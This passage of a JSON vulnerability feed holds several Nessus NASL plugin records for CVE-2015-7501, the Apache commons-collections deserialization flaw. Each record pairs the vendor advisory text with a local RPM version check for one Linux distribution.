"sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2521 and \n# Oracle Linux Security Advisory ELSA-2015-2521 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87118);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2521\");\n\n script_name(english:\"Oracle Linux 6 : jakarta-commons-collections (ELSA-2015-2521)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2521 :\n\nUpdated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-November/005595.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:11", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons- collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific deserialization vulnerability is to remove the vulnerable class files (InvokerTransformer, InstantiateFactory, and InstantiateTransformer) in all commons-collections jar files. Any manual changes should be tested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-22T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : jakarta-commons-collections on SL5.x i386/x86_64 (20151221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-debuginfo", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20151221_JAKARTA_COMMONS_COLLECTIONS_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87587", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87587);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n\n script_name(english:\"Scientific Linux Security Update : jakarta-commons-collections on SL5.x i386/x86_64 (20151221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-\ncollections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific\ndeserialization vulnerability is to remove the vulnerable class files\n(InvokerTransformer, InstantiateFactory, and InstantiateTransformer)\nin all commons-collections jar files. Any manual changes should be\ntested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1512&L=scientific-linux-errata&F=&S=&P=3803\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45cd4a70\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:13", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-03T00:00:00", "type": "nessus", "title": "CentOS 6 : jakarta-commons-collections (CESA-2015:2521)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:jakarta-commons-collections", "p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2015-2521.NASL", "href": "https://www.tenable.com/plugins/nessus/87174", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2521 and \n# CentOS Errata and Security Advisory 2015:2521 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87174);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2521\");\n\n script_name(english:\"CentOS 6 : jakarta-commons-collections (CESA-2015:2521)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-December/021512.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd1e83b8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:23", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-21T00:00:00", "type": "nessus", "title": "RHEL 5 : jakarta-commons-collections (RHSA-2015:2671)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-debuginfo", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2015-2671.NASL", "href": "https://www.tenable.com/plugins/nessus/87519", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2671. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87519);\n script_version(\"2.18\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2671\");\n\n script_name(english:\"RHEL 5 : jakarta-commons-collections (RHSA-2015:2671)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) 